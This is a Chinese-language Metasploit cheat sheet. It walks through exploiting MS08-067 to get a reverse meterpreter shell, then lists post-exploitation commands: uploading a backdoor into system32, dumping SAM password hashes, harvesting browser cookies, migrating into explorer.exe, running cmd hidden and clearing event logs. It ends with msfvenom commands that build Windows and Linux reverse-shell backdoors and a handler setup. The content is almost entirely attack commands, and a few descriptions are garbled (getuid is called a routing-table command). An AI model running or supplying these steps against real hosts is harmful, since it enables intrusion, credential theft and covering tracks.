0x01 msf获取shell
启动 msfconsole
搜索某个模块 search ms08-067
使用某个模块 use exploit/windows/smb/ms08-067_netapi
查看当前模块可以使用的payload[可以省略] show payloads
查看当前模块需要的参数配置 show options[可略]
选择反弹shell的模块 set payload windows/meterpreter/reverse_tcp
设置目标的IP地址 set RHOST 192.168.10.1
设置本地的IP地址 set LHOST 192.168.1.1
设置本地的监听端口 set LPORT 8888
show targets 查看metasploit的渗透攻击模块通常可以列出受到漏洞影响的目标系统类型。
如某些漏洞只适用特定系统的某些版本,这时可以根据目标的操作类型版本来设置版本 set target 1
进行攻击 run/exploit,这样就返回一个meterpreter
0x02 meterpreter常用命令
1 、background : 把meterpreter后台挂起
2 、sessions : 查看已经成功获取的会话
sessions - i + num : 连接到指定序列号的meterpreter会话继续利用
sessions - i 2 : 连接第三个会话主机
3 、shell:获取目标主机的远程命令行shell,使用exit 退出当前的shell
4 、cat : 查看目标主机上的文档内容
cat c : / test. txt
5 、getwd : 获取系统工作的当前目录
6 、upload : 上传文件到目标主机
upload setup. exe c : \\windows\\system32\ 把后门程序setup. exe上传到目标主机的system32目录下
7 、download : 把目标主机上的文件下载到我们的攻击主机上
download C : \\boot. in / root/ 把目标主机c盘根目录下的boot. ini文件下载到攻击主机的/ root/ 目录下
8 、edit:调用vi编辑器,对目标主机的文件进行修改
edit C : / Windows/ System32/ drivers/ etc/ hosts 修改目标主机的hosts文件
9 、search : 再目标主机上搜索文件
search - d c : \\ - f * . doc 在目标主机的C 盘下搜索doc文档
10 、ipconfig/ ifconfig : 查看目标主机上的网络参数
11 、portfwd : 端口转发,把目标主机的3389 端口转发到其他端口
portfwd add - l 1122 - p 3389 - r 192.168 .10 .1
把目标主机的3389 端口转发到192.168 .10 .1 的1122 端口,访问192.168 .10 .1 :1122 就能打开目标主机的远程桌面
12 、route : 显示目标主机上的主机路由表
13 、getuid : 显示目标主机上的主机路由表
14 、sysinfo : 查看目标主机的系统信息
15 、getpid : 获取meterpreter会话在 目标主机上的注入进程的进程号
16 、migrate : 将meterpreter会话进程移植到另外一个进程
如果我们反弹的meterpreter会话是对方打开了一个预设代码的word文档产生的,如果对方一旦关闭该word文档,我们获取的meterpreter会话就
会关闭,所以我们需要把会话进程注入到explorer. exe ( 桌面进程
先用ps 查看explorer. exe进程的pid为 xxx,
然后执行 migrate xxx
17 、execute : 在目标主机上运行某个程序
execute - f - i - H cmd. exe 以隐藏的方式运行cmd. exe
18 、shutdown : 关闭目标主机
19 、getsystem : 使用该命令提升当前进程的执行账户为system用户, 拿到系统的最高权限
20 、hashdump : 在获得system权限的情况下,使用hashdump命令可以得到目标的SAM 文件,获取目标主机账号密码的hash信息
21 、run post/ windows/ gather/ checkvm
在meterpreter下run post/ windows/ gather/ checkvm 检测是否为一台虚拟机
22 、run post/ windows/ gather/ enum_applications
在meterpreter下run post/ windows/ gather/ enum_applications 获取目标主机上的软件安装信息
23 、run post/ windows/ gather/ dumplinks
在meterpreter下run post/ windows/ gather/ dumplinks 获取目标主机最近访问过的文档、链接等信息
24 、run post/ windows/ gather/ enum_ie
在meterpreter下run post/ windows/ gather/ enum_ie
获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的/ root/ . msf5/ loot/ 目录下
25 、clearev命令: 入侵痕迹清除
0x03 MSF生成后门
1 、生成windows后门:
msfvenom - p windows/ meterpreter/ reverse_tcp LHOST = 攻击机IP LPORT = 攻击端口 - f exe - o / tmp/ hack. exe
2 、生成linux后门
msfvenom - p linux/ x86/ meterpreter/ reverse_tcp LHOST = 攻击ip LPORT = 攻击端口 - f elf > shell. elf
use exploit / multi/ handler
set payload windows/ meterpreter/ reverse_tcp
set LHOST 192.168 .1 .53
set LPORT 4444
exploit